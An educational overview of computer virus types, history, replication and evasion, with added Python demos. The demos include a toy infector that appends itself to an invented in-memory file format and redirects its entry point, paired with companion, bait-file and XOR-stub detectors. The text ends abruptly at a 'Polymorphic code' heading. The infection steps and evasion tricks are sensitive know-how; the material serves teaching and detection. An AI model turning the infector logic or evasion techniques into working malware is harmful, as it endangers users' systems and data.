File viruses are pieces of code that attach themselves to executable files, driver files or compressed files, and are activated when the host program is run. After activation, the virus may spread by attaching itself to other programs on the system, and may also carry out the malicious activity it was programmed for. Most file viruses spread by loading themselves into system memory and looking for other programs on the drive. When one is found, the virus modifies that program's code so that it contains, and activates, the virus the next time it is run. It keeps doing this until it has spread across the system, and possibly to other systems with which the infected program is shared. Besides spreading themselves, these viruses usually carry some kind of destructive payload that can be activated immediately or by a particular 'trigger'. The trigger could be a specific date, the number of times the virus has replicated, or anything equally arbitrary. Some examples of file viruses are Randex, Meve and MrKlunky.

Boot sector viruses

A boot sector virus infects the boot sector of a floppy or hard disk, which is a crucial part of the disk. The boot sector holds information about the disk layout, along with the small program that lets the operating system start. By inserting its code into the boot sector, a virus guarantees that it is loaded into memory during every boot sequence. A boot virus does not infect files; it infects the disks that contain them. Perhaps this is the reason for its decline. In the days when programs were carried around on floppies, boot sector viruses spread like wildfire. With the CD-ROM revolution, pre-written data on a CD could not be infected, which eventually stopped such viruses from spreading. Though boot viruses still exist, they are rare compared with new-age malicious software. Another reason they are not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive. Examples of boot viruses are Polyboot.B and AntiEXE.

Multipartite viruses

Multipartite viruses are a combination of boot sector viruses and file viruses. These viruses come in through infected media and reside in memory. They then move on to the boot sector of the hard drive. From there, the virus infects executable files on the hard drive and spreads across the system. There aren't many multipartite viruses in existence today, but in their heyday they caused some major problems because of their capacity to combine different infection techniques. A well-known multipartite virus is Ywinz.

Macro viruses

Macro viruses infect files that contain macros. These include Microsoft Office documents such as Word documents, Excel spreadsheets, PowerPoint presentations and Access databases, and similar application files such as Corel Draw and AmiPro documents. Since macro viruses are written in the language of the application, not in that of the operating system, they are platform-independent: they can spread between Windows, Mac and any other system, as long as the required application is running there. With the ever-increasing capabilities of macro languages in applications, and the possibility of infections spreading over networks, these viruses are major threats. The first macro virus was written for Microsoft Word and was discovered in August 1995. Today there are thousands of macro viruses in existence; some examples are Relax, Melissa.A and Bablas.

Network viruses

This kind of virus is proficient at spreading quickly across a Local Area Network (LAN) or even over the Internet. Usually it propagates through shared resources, such as shared drives and folders. Once it infects a new system, it searches the network for other vulnerable systems. Once a new vulnerable system is found, the network virus infects it, and thus spreads over the network. Some of the most notorious network viruses are Nimda and SQL Slammer.

E-mail viruses

An e-mail virus may be a form of macro virus that sends itself to all the contacts in the host's e-mail address book. If any of the recipients opens the attachment of the infected mail, it spreads to the new host's address book contacts and proceeds to send itself to all of them as well. These days, e-mail viruses can infect hosts even if the infected e-mail is only previewed in a mail client. There are many ways in which a virus can infect, or stay dormant on, your PC. Whether active or dormant, it is dangerous to leave one loose on your system, and it should be dealt with immediately.

Other malicious software

Earlier, the only way a computer was at risk was when you inserted an infected floppy. With the new age of technology, every computer is interconnected with the rest of the world at some point or other, so it is difficult to pinpoint the source and/or time of an infection. As if that weren't bad enough, new-age computing has also brought a new breed of malicious software. Today, the term 'virus' has become a generic term for all the different ways your computer can be attacked by malicious software. Besides the types of viruses mentioned above, here is a look at some of the newer problems we face today.

Trojan horses

The biggest difference between a Trojan horse (or Trojan) and a virus is that Trojans do not spread themselves. Trojan horses disguise themselves as useful software available for download on the Internet, and naive users download and run them, only to realise their mistake later. A Trojan horse is usually divided into two parts: a server and a client. The server is the part that is cunningly disguised as important software and placed on peer-to-peer file-sharing networks or unofficial download sites; it is called the server because, once it runs on your system, it listens for the attacker's connection. The attacker keeps the client, connects with it to the planted server, and then has a high level of control over your system, which can lead to devastating effects depending on the attacker's intentions. Trojan horses have evolved to a tremendous level of sophistication, which makes each one significantly different from the others. We have categorised them roughly as follows:

Remote access Trojans

These are the most commonly available Trojans. They give an attacker complete control over the victim's computer. The attacker can go through the files and access any personal information about the user that may be stored in them, such as credit card numbers, passwords and important financial documents.

Password-sending Trojans

The purpose of such Trojans is to copy all cached passwords, capture other passwords as you enter them, and send them to a specific e-mail address without the user's knowledge. Passwords for restricted Web sites, messaging services, FTP services and e-mail services come under direct threat from this kind of Trojan.

Keyloggers

These log the victim's keystrokes and then send the logs to the attacker, who searches them for passwords or other sensitive data. Most come with two modes, online and offline recording, and they can be configured to send the log file to a specific e-mail address on a daily basis.

Destructive Trojans

The only function of these Trojans is to destroy and delete files. They can automatically delete all the core system files on your machine. The Trojan could be controlled by the attacker, or programmed to strike like a logic bomb, starting on a specific day or at a specific hour.

Denial of Service (DoS) attack Trojans

The main idea behind DoS attack Trojans is to generate so much Internet traffic on the victim's machine that the Internet connection is too overloaded to let the user visit a website or download anything. Another variation of the DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail addresses with random subjects and contents that cannot be filtered.

Proxy/Wingate Trojans

These Trojans turn the victim's computer into a proxy (Wingate) server. The infected computer is then available to the whole world for anonymous access to various risky Internet services. The attacker can register domains or access pornographic Web sites with stolen credit cards, or carry out similar illegal activities, without being traced.

FTP Trojans

These Trojans are probably the simplest, and are outdated. The only thing they do is open port 21, the port for FTP transfers, and let everyone connect to your machine. Newer versions are password-protected, so only the attacker can connect.

Software detection killers

These Trojans kill the popular antivirus and firewall programs that protect your machine, giving the attacker access to it. A Trojan could have any one, or a combination, of the functions listed above.

Worms

Computer worms are programs that reproduce and run independently and travel across network connections. The main difference between viruses and worms is the method by which they reproduce and spread. A virus depends on a host file or boot sector, and on the transfer of files between machines, to spread, while a worm can run completely independently and spread of its own accord through network connections. The security threat from worms is equivalent to that of a virus. Worms can do a whole range of damage, such as destroying essential files on your system, slowing it down to a great extent, or even causing essential programs to crash. Two famous examples of worms are the MS Blaster and Sasser worms.

Spyware

Spyware is often bundled with advertising-supported software (adware). Advertising in shareware products is a way for shareware authors to make money other than by selling the product to the user. Several large media companies offer to place banner ads in such products in exchange for a portion of the revenue from banner sales. If the user finds the banners annoying, there is usually an option to get rid of them by paying the licensing fee. Unfortunately, the advertising companies often also install additional tracking software on your system, which continuously uses your Internet connection to send statistical data back to the advertisers. While the companies' privacy policies claim that no sensitive or identifying data is collected from your system and that you remain anonymous, the fact remains that you have a server sitting on your PC sending information about you and your surfing habits to a remote location, using your bandwidth. Spyware has been known to slow computers down with its semi-intensive use of processing power, to bring up annoying pop-up windows at the most inappropriate times, and to change your Internet browsing settings, such as your home page or default search engine, to the advertisers' own services. Even if many do not consider this illegal, it is still a major security threat, and the fact that it is hard to get rid of makes it as much of a nuisance as a virus.

Logic bombs

A logic bomb is a program that has been deliberately written or modified to produce results, when certain conditions are met, that are unexpected by and unauthorised by the legitimate users or owners of the software. Logic bombs may reside within standalone programs, or they may be part of worms or viruses. A variation of the logic bomb is the time bomb, which 'explodes' at a certain time. An example of a time bomb is the infamous 'Friday the 13th' virus.

Classification

Viruses can be subdivided into a number of types, the main ones being:

• Boot sector viruses

• Companion viruses

• Email viruses

• Logic bombs and time bombs

• Macro viruses

• Cross-site scripting viruses

Two other types of malware are often classified as viruses, but are actually forms of distributing malware:

• Trojan horses

• Worms

Boot sector virus

A boot sector virus alters or hides in the boot sector, usually the first sector, of a bootable disk or hard drive. Boot sector viruses were prevalent in the 1980s.

Companion virus

A companion virus does not have host files per se, but exploits the way MS-DOS looks up commands. A companion virus creates new files (typically .COM, but other extensions such as ".EXD" have been reported) that have the same base names as legitimate .EXE files. When a user types the name of a program without an extension, COMMAND.COM searches for it with the extensions .COM, .EXE and .BAT, in that order, so a .COM file wins over an .EXE of the same name in the same directory. For instance, if a user has "filename.COM" (the virus) and "filename.EXE" and types "filename", DOS runs "filename.COM" and so runs the virus. The virus spreads and performs its other tasks before handing over to the legitimate file, which then runs normally. Some companion viruses are known to run under Windows 95 and under DOS emulation on Windows NT systems. Path companion viruses create files that have the same name as the legitimate file and place the virus copies in directories that come earlier in the PATH, so they are found first. These viruses have become increasingly rare since Windows XP, which no longer runs on top of MS-DOS, although its cmd.exe still tries .COM before .EXE (the PATHEXT order), so the same shadowing is possible in principle.
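As an added example (not code from the original page), the following Python script models the MS-DOS command lookup that a companion virus abuses, and the structural check a scanner can make for it. The extension precedence (.COM, then .EXE, then .BAT) and the search order (current directory first, then each PATH entry) are the real COMMAND.COM rules; the directory contents, the PATH and the file names are constructed for the demonstration.

```python
# Model of MS-DOS command lookup, to show why a companion virus works.
# Added example, not code from the original page. The precedence
# .COM > .EXE > .BAT and the search order (current directory, then PATH)
# are the real COMMAND.COM rules; the disk layout below is constructed.
from typing import Dict, List, Optional

# COMMAND.COM tries these extensions, in this order, in each directory it searches.
EXTENSION_ORDER = (".COM", ".EXE", ".BAT")


def resolve_command(command: str, cwd: str, path_dirs: List[str],
                    filesystem: Dict[str, List[str]]) -> Optional[str]:
    """Return the path COMMAND.COM would run for `command`, or None if not found.

    `filesystem` maps a directory to the names it contains (a stand-in for a disk).
    """
    name = command.upper()
    if "." in name:
        candidates = [name]                         # explicit extension: no guessing
    else:
        candidates = [name + ext for ext in EXTENSION_ORDER]
    for directory in [cwd] + path_dirs:             # current directory is searched first
        entries = {f.upper() for f in filesystem.get(directory, [])}
        for candidate in candidates:                # first extension hit wins
            if candidate in entries:
                return directory + "\\" + candidate
    return None


def find_companions(filesystem: Dict[str, List[str]]) -> List[str]:
    """Flag every .COM whose base name matches an .EXE anywhere on the disk.

    No signature is needed: a .COM/.EXE pair with the same base name is
    exactly the structure a companion virus creates, so it is worth a look.
    """
    exe_bases = set()
    for names in filesystem.values():
        for f in names:
            if f.upper().endswith(".EXE"):
                exe_bases.add(f.upper()[:-4])
    suspects = []
    for directory, names in filesystem.items():
        for f in names:
            if f.upper().endswith(".COM") and f.upper()[:-4] in exe_bases:
                suspects.append(directory + "\\" + f.upper())
    return sorted(suspects)


# Constructed disk: a companion WP.COM beside the real WP.EXE, and a path
# companion EDIT.COM in C:\TEMP, which precedes the real EDIT.EXE's C:\DOS in PATH.
DISK = {
    "C:\\APPS": ["WP.EXE", "WP.COM"],
    "C:\\TEMP": ["EDIT.COM"],
    "C:\\DOS": ["EDIT.EXE", "FORMAT.COM"],
}
PATH = ["C:\\TEMP", "C:\\DOS"]
CWD = "C:\\APPS"

if __name__ == "__main__":
    for cmd in ("wp", "wp.exe", "edit", "format", "nothere"):
        print(cmd.ljust(8), "->", resolve_command(cmd, CWD, PATH, DISK))
    print("possible companions:", find_companions(DISK))
```

resolve_command("wp", ...) returns the .COM companion even though the user wanted WP.EXE, and resolve_command("edit", ...) returns the path companion in C:\TEMP because that directory sits earlier in PATH than C:\DOS. find_companions flags both without any virus signature, which is the same structural check older scanners used; it cannot tell a malicious companion from a legitimate .COM/.EXE pair, so treat its output as a lead rather than a verdict.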

E-mail virus

An E-mail virus is a virus which uses e-mail messages as a mode of transport. These

viruses often copy themselves by automatically mailing copies to hundreds of people in the

victim's address book.


Logic bomb

A logic bomb employs code that lies inert until specific conditions are met. Satisfying the conditions triggers a certain function (such as printing a message to the user and/or deleting files). An example of a logic bomb would be a virus that waits to execute its payload until it has infected a certain number of hosts. A time bomb is a subset of the logic bomb, set to trigger on a particular date and/or time.

Macro virus

A macro virus, often written in the scripting languages for Microsoft programs such as

Word and Excel, is spread in Microsoft Office by infecting documents and spreadsheets.

Cross-site scripting virus

A cross-site scripting virus (XSSV) is a type of virus that utilizes cross-site scripting

vulnerabilities to replicate. A XSSV is spread between vulnerable web applications and web

browsers creating a symbiotic relationship.

Trojan horse

Trojan Horses are impostor files that claim to be something desirable but, in fact, are

malicious. Rather than insert code into existing files, a Trojan horse appears to do one thing

(install a screen saver, or show a picture inside an e-mail for example) when in fact it does

something entirely different, and potentially malicious, such as erase files. Trojans can also

open back doors so that computer hackers can gain access to passwords, and other personal

information stored on a computer.

Although often referred to as such, Trojan horses are not viruses in the strict sense

because they cannot replicate automatically. For a Trojan horse to spread, it must be invited

onto a computer by the user opening an email attachment or downloading and running a file

from the Internet, for example.

Worm

A worm is a piece of software that uses computer networks and security flaws to create copies of itself. A copy of the worm scans the network for any other machine that has a specific security flaw, replicates itself to the new machine using that flaw, and then begins scanning and replicating anew.

Worms are programs that replicate themselves from system to system without the use of a host file, in contrast to viruses, which require the spreading of an infected host file. Some worms do travel inside other files, often Word or Excel documents, but there is a difference in how worms and viruses use the host file. Usually the worm releases a document that already has the "worm" macro inside it; the entire document travels from computer to computer, so the entire document should be considered the worm. Mydoom and ILOVEYOU are two examples of worms.

Effects of computer viruses

Some viruses are programmed to damage the computer by damaging programs,

deleting files, or reformatting the hard disk. Others are not designed to do any damage, but

simply replicate themselves and make their presence known by presenting text, video, or

audio messages. Even these benign viruses can create problems for the computer user. They

typically take up computer memory used by legitimate programs. As a result, they often cause

erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden,

and these bugs may lead to system crashes and data loss.

Use of the word "virus"

The word virus is derived from, and used in the same sense as, its biological equivalent. The term "virus" is often used in common parlance to describe all kinds of malware (malicious software), including programs more properly classified as worms or Trojans. Most popular anti-virus software packages defend against all of these types of attack. In some technical communities, the term "virus" is also extended to the authors of malware, in an insulting sense. The English plural of "virus" is "viruses". Some people use "virii" or "viri" as the plural, but this is rare and not standard.

The term "virus" was first used in an academic publication by Fred Cohen in his 1984 paper Experiments with Computer Viruses, where he credits Len Adleman with coining it. However, a 1972 science fiction novel by David Gerrold, When H.A.R.L.I.E. Was One, includes a description of a fictional computer program called "VIRUS" that worked just like a virus (and was countered by a program called "VACCINE"). The term "computer virus" in its current sense also appears in the comic book Uncanny X-Men #158, written by Chris Claremont and published in 1982. So although Cohen's use of "virus" may have been the first "academic" use, the term had been used earlier.


History

A program called "Elk Cloner" is credited with being the first computer virus to appear "in the wild", that is, outside the single computer or lab where it was created. Written in 1982 by Rich Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk. The virus was originally a joke, created by the high-school student and put onto a game. The game was set to play normally, but to release the virus on the 50th start: instead of playing the game, the screen went blank and displayed a poem about the virus, Elk Cloner, and the computer was then infected.

The first PC virus was a boot sector virus called (c)Brain, created in 1986 by two brothers,

Basit and Amjad Farooq Alvi, operating out of Lahore, Pakistan. The brothers reportedly

created the virus to deter pirated copies of software they had written. However, analysts have

claimed that the Ashar virus, a variant of Brain, possibly predated it based on code within the

virus.

Before computer networks became widespread, most viruses spread on removable

media, particularly floppy disks. In the early days of the personal computer, many users

regularly exchanged information and programs on floppies. Some viruses spread by infecting

programs stored on these disks, while others installed themselves into the disk boot sector,

ensuring that they would be run when the user booted the computer from the disk.

Traditional computer viruses emerged in the 1980s, driven by the spread of personal

computers and the resultant increase in BBS and modem use, and software sharing. Bulletin

board driven software sharing contributed directly to the spread of Trojan horse programs,

and viruses were written to infect popularly traded software. Shareware and bootleg software

were equally common vectors for viruses on BBS's. Within the "pirate scene" of hobbyists

trading illicit copies of commercial software, traders in a hurry to obtain the latest

applications and games were easy targets for viruses.

Since the mid-1990s, macro viruses have become common. Most of these viruses are

written in the scripting languages for Microsoft programs such as Word and Excel. These

viruses spread in Microsoft Office by infecting documents and spreadsheets. Since Word and

Excel were also available for Mac OS, most of these viruses were able to spread on

Macintosh computers as well. Most of these viruses did not have the ability to send infected

e-mail. Those viruses which did spread through e-mail took advantage of the Microsoft

Outlook COM interface.


Macro viruses pose unique problems for detection software. For example, some

versions of Microsoft Word allowed macros to replicate themselves with additional blank

lines. The virus behaved identically but would be misidentified as a new virus. In another

example, if two macro viruses simultaneously infect a document, the combination of the two,

if also self-replicating, can appear as a "mating" of the two and would likely be detected as a

virus unique from the "parents".

A computer virus may also be transmitted through instant messaging. A virus may

send a web address link as an instant message to all the contacts on an infected machine. If

the recipient, thinking the link is from a friend (a trusted source) and follows the link to the

website, the virus hosted at the site may be able to infect this new computer and continue

propagating.

The newest species of the virus family is the cross-site scripting virus. The virus emerged from research and was academically demonstrated in 2005. It uses cross-site scripting vulnerabilities to propagate. Since 2005 there have been multiple instances of cross-site scripting viruses in the wild; the most notable sites affected have been MySpace and Yahoo.


Why do people write and spread viruses?

It is difficult to know why people write them. Everyone has their own reasons. Some general reasons are to experiment with how to write viruses or to test their programming talent. Some people just like to see how the virus spreads and gets famous around the world. The following list, drawn from postings to the newsgroup alt.comp.virus, tries to explain why people write and spread viruses.

• They don't understand, or prefer not to think about, the consequences for other people

• They simply don't care

• They don't consider it to be their problem if someone else is inconvenienced

• They draw a false distinction between creating/publishing viruses and distributing them

• They consider it to be the responsibility of someone else to protect systems from their creations

• They get a buzz, acknowledged or otherwise, from vandalism

• They consider they're fighting authority

• They like 'matching wits' with anti-virus vendors

• It's a way of getting attention, getting recognition from their peers and their names (or at least that of their virus) in the papers and the WildList

• They're keeping the anti-virus vendors in a job

Replication strategies

In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user tries to start an infected program, the virus's code may be executed first. Viruses can be divided into two types on the basis of their behaviour when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect these targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or by the operating system itself.


Nonresident viruses

Nonresident viruses can be thought of as consisting of a finder module and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that file.

For simple viruses the replicator's tasks are to:

1. Open the new file

2. Check whether the executable file has already been infected (if it has, return to the finder module)

3. Append the virus code to the executable file

4. Save the executable's starting point

5. Change the executable's starting point so that it points to the start of the newly copied virus code

6. Save the old start location in the virus in such a way that the virus branches to that location right after its own execution

7. Save the changes to the executable file

8. Close the infected file

9. Return to the finder so that it can find new files for the replicator to infect
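The nine replicator steps, together with the finder that drives them, as an added example in Python (not code from the original page). Rather than touch real executables, it uses a constructed "TOY" format (a 4-byte magic, a 4-byte little-endian entry offset, then the body) held in an in-memory dictionary that stands in for a disk; the marker string and the sample hosts are likewise constructed. It also shows the two detections the steps invite: the marker consulted in step 2 doubles as a signature, and the redirected entry point of step 5 is a generic heuristic that needs no signature at all.

```python
# Toy model of the nonresident infector described in the steps above: a finder
# that walks a directory listing and a replicator that appends the virus body
# and redirects the entry point. Added example, not code from the original
# page. The "TOY" executable format, the marker string and the in-memory disk
# are constructed for this demonstration; nothing here touches real files.
import struct
from typing import Dict, List

MAGIC = b"TOY1"
HEADER_LEN = 8                  # 4-byte magic + 4-byte little-endian entry offset
MARKER = b"<<toy-virus>>"       # infection marker; doubles as the scanner's signature


def build_host(body: bytes) -> bytes:
    """Assemble a clean TOY executable whose entry point is the start of its body."""
    return MAGIC + struct.pack("<I", HEADER_LEN) + body


def entry_point(image: bytes) -> int:
    return struct.unpack_from("<I", image, 4)[0]


def is_infected(image: bytes) -> bool:
    return MARKER in image      # step 2: look for the marker left by an earlier infection


def replicate(image: bytes) -> bytes:
    """Steps 2 to 7: append the virus code and point the entry at it."""
    if not image.startswith(MAGIC):
        raise ValueError("not a TOY executable")
    if is_infected(image):
        return image            # already infected: hand straight back to the finder
    old_entry = entry_point(image)          # step 4: save the original starting point
    new_entry = len(image)                  # step 3: the virus body goes at the end
    # step 6: the appended code carries the old entry so it can branch back to the host
    virus_code = MARKER + struct.pack("<I", old_entry)
    # step 5 (new header) + original body + step 3 (appended code) = step 7's saved file
    return MAGIC + struct.pack("<I", new_entry) + image[HEADER_LEN:] + virus_code


def finder(disk: Dict[str, bytes]) -> List[str]:
    """Step 9 in a loop: visit every candidate host and call the replicator on it."""
    touched = []
    for name, image in list(disk.items()):
        if name.upper().endswith(".TOY") and image.startswith(MAGIC) and not is_infected(image):
            disk[name] = replicate(image)   # steps 1 and 8 (open/close) are implicit here
            touched.append(name)
    return touched


def execute(image: bytes) -> List[str]:
    """Trace what runs: the virus first if the entry points at it, then the host."""
    trace = []
    entry = entry_point(image)
    if image[entry:entry + len(MARKER)] == MARKER:
        trace.append("virus")
        entry = struct.unpack_from("<I", image, entry + len(MARKER))[0]   # branch back
    trace.append("host" if entry == HEADER_LEN else "corrupt")
    return trace


def scan(image: bytes) -> List[str]:
    """Two detections: the marker as a signature, and the generic redirected-entry heuristic."""
    findings = []
    if MARKER in image:
        findings.append("signature")
    if entry_point(image) != HEADER_LEN:
        findings.append("entry-point-redirected")
    return findings


if __name__ == "__main__":
    disk = {"A.TOY": build_host(b"hello"), "B.TOY": build_host(b"world"), "NOTES.TXT": b"text"}
    print("infected:", finder(disk))
    print("A.TOY runs:", execute(disk["A.TOY"]), "scan:", scan(disk["A.TOY"]))
```

A second pass of finder over the same disk infects nothing, which is exactly what step 2 is for: without the marker check the virus would keep appending copies of itself and the host would grow on every run. The same marker is what gives a scanner its signature, which is why real infectors hide or vary it; the entry-point heuristic survives that, at the cost of also firing on packed or otherwise unusual legitimate programs.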

Resident viruses

Resident viruses contain a replication module that is similar to the one that is

employed by nonresident viruses. However, this module is not called by a finder module.

Instead, the virus loads the replication module into memory when it is executed and ensures

that this module is executed each time the operating system is called to perform a certain

operation. For example, the replication module can be called each time the operating system

executes a file. In this case, the virus infects every suitable program that is executed on the

computer.

Resident viruses are sometimes subdivided into a category of fast infectors and a category of slow infectors. Fast infectors are designed to infect as many files as possible. For instance, a fast infector can infect every potential host file that is accessed. This poses a special problem for anti-virus software, since a virus scanner accesses every potential host file on a computer when it performs a system-wide scan. If the virus scanner fails to notice that such a virus is present in memory, the virus can "piggy-back" on the virus scanner and in this way infect all the files that are scanned. Fast infectors rely on their fast infection rate to spread. The disadvantage of this method is that infecting many files may make detection more likely, because the virus may slow down the computer or perform many suspicious actions that can be noticed by anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. For instance, some slow infectors only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down a computer noticeably, and will at most infrequently trigger anti-virus software that detects suspicious behaviour by programs. The slow infector approach does not seem very successful, however.

Host types

Viruses have targeted various types of hosts. This is a non-exhaustive list:

• Binary executable files (such as COM files and EXE files in MS-DOS, Portable

Executable files in Microsoft Windows, and ELF files in Linux)

• Volume Boot Records of floppy disks and hard disk partitions

• The master boot record (MBR) of a hard disk

• General-purpose script files (such as batch files in MS-DOS and Microsoft

Windows, VBScript files, and shell script files on Unix-like platforms).

• Application-specific script files (such as Telix-scripts)

• Documents that can contain macros (such as Microsoft Word documents, Microsoft

Excel spreadsheets, AmiPro documents, and Microsoft Access database files)

Methods to avoid detection

In order to avoid detection by users, some viruses employ different kinds of deception.

Some old viruses, especially on the MS-DOS platform, make sure that the "last modified"

date of a host file stays the same when the file is infected by the virus. This approach does not

fool anti-virus software, however.

Some viruses can infect files without increasing their sizes or damaging the files. They

accomplish this by overwriting unused areas of executable files. These are called cavity

viruses. For example the CIH virus, or Chernobyl Virus, infects Portable Executable files.

Because those files had many empty gaps, the virus, which was 1 KB in length, did not add to

the size of the file.

Some viruses try to avoid detection by killing the tasks associated with antivirus

software before it can detect them.


As computers and operating systems grow larger and more complex, old hiding

techniques need to be updated or replaced.

Avoiding bait files and other undesirable hostsAvoiding bait files and other undesirable hosts

A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integrity check of their own code. Infecting such programs will therefore increase the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software. Another type of host that viruses sometimes avoid is the bait file. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus:

• Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file than to exchange a large application program that has been infected by the virus.

• Anti-virus professionals can use bait files to study the behavior of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus.

• Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the user that a virus is probably active on the system.

Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage instructions'. A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.
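The bait-file monitoring described in the last bullet, written out as an added example (not code from this page): it records a content hash of each bait file and re-checks it, deliberately treating size and timestamp as no evidence of cleanliness, because the "Methods to avoid detection" section notes that some viruses preserve the modification date and cavity viruses leave the size unchanged. The file name, contents and the simulated in-place patch are constructed for the demo.

```python
import hashlib
import os
import tempfile

# Added example, not code from the page. Paths and contents are constructed.
BAIT_CONTENT = b"BAIT" * 128  # 512 bytes of fixed, known content


def file_digest(path):
    """SHA-256 of the file contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def create_bait(path):
    """Write a bait file and return its baseline record.

    Size and mtime are recorded only so that a later check can report when
    they were preserved; the digest is the actual evidence.
    """
    with open(path, "wb") as f:
        f.write(BAIT_CONTENT)
    st = os.stat(path)
    return {"digest": file_digest(path), "size": st.st_size, "mtime_ns": st.st_mtime_ns}


def check_bait(path, baseline):
    """Return a list of findings; an empty list means the bait looks untouched."""
    if not os.path.exists(path):
        return ["bait file missing"]
    st = os.stat(path)
    findings = []
    if file_digest(path) != baseline["digest"]:
        findings.append("content changed")
        # Changed content with unchanged size or mtime matches the cavity and
        # timestamp-preserving tricks described in the text.
        if st.st_size == baseline["size"]:
            findings.append("size unchanged")
        if st.st_mtime_ns == baseline["mtime_ns"]:
            findings.append("mtime unchanged")
    return findings


def demo():
    """Constructed scenario: patch the bait in place, then put the old mtime back."""
    path = os.path.join(tempfile.mkdtemp(), "GOAT.COM")
    baseline = create_bait(path)
    untouched = check_bait(path, baseline)
    with open(path, "r+b") as f:  # overwrite 4 bytes without changing the size
        f.seek(16)
        f.write(b"XXXX")
    os.utime(path, ns=(baseline["mtime_ns"], baseline["mtime_ns"]))
    return untouched, check_bait(path, baseline)


if __name__ == "__main__":
    print(demo())  # ([], ['content changed', 'size unchanged', 'mtime unchanged'])
```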

Stealth

Some viruses try to trick anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it seems that the file is "clean". Modern anti-virus software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to avoid stealth is to boot from a medium that is known to be clean.

Self-modification

Most modern antivirus programs try to find virus patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.

Simple self-modifications

In the past, some viruses modified themselves only in simple ways. For example, they regularly exchanged subroutines in their code for others that would perform the same action - for example, 2+2 could be swapped for 1+3. This poses no problems to a somewhat advanced virus scanner.

Encryption with a variable key

A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible.

The decryption techniques that these viruses employ are mostly simple: typically each byte is XORed with a randomized key that was saved by the parent virus. The use of XOR operations has the additional advantage that the encryption and decryption routines are the same (a XOR b = c, c XOR b = a).
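An added example (not code from this page) of the indirect detection just described: a constructed sample lays out a constant decryptor stub followed by a body XORed with a per-infection key, and the three scanner functions show that the plaintext body signature no longer matches, the stub signature still does, and a single-byte key can be recovered by trial decryption over all 256 candidates. The stub and body bytes are arbitrary placeholders, not real virus code.

```python
# Added example, not code from the page. The "stub" and "body" below are
# made-up byte strings standing in for a constant decryptor and a virus body.
DECRYPTOR_STUB = bytes.fromhex("b9 00 10 be 00 01 80 34 aa 46 e2 fa")
PLAIN_BODY = b"\x00" * 8 + b"CONSTRUCTED-BODY-SIGNATURE" + b"\x00" * 8

STUB_SIGNATURE = DECRYPTOR_STUB[:8]          # what a scanner knows about the stub
BODY_SIGNATURE = b"CONSTRUCTED-BODY-SIGNATURE"  # what it knows about the plaintext body


def xor_bytes(data, key):
    """XOR every byte with a one-byte key; the same routine encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def build_sample(key):
    """Constructed 'infected file': [host bytes][decryptor stub][body XORed with key]."""
    host = b"HOST-PROGRAM-PREFIX"
    return host + DECRYPTOR_STUB + xor_bytes(PLAIN_BODY, key)


def scan_plain_signature(data):
    """Naive scanner: looks only for the plaintext body signature."""
    return BODY_SIGNATURE in data


def scan_decryptor_stub(data):
    """Scanner keyed on the part that stays constant across infections."""
    return STUB_SIGNATURE in data


def recover_xor_key(data):
    """Trial-decrypt the bytes after the stub under all 256 single-byte keys.

    Returns the key under which the body signature appears, or None if the
    stub is absent or no key reveals the signature.
    """
    idx = data.find(STUB_SIGNATURE)
    if idx < 0:
        return None
    candidate = data[idx + len(DECRYPTOR_STUB):]
    for key in range(256):
        if BODY_SIGNATURE in xor_bytes(candidate, key):
            return key
    return None


if __name__ == "__main__":
    sample = build_sample(0x5A)
    print(scan_plain_signature(sample))   # False: body signature is hidden
    print(scan_decryptor_stub(sample))    # True: the stub is still constant
    print(recover_xor_key(sample))        # 90 (0x5A): key recovered by trial decryption
```

The stub-based check is exactly what a polymorphic engine defeats, since it rewrites the decryptor on every infection; that gap is why the text mentions emulation and statistical analysis of the encrypted body.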


Polymorphic code

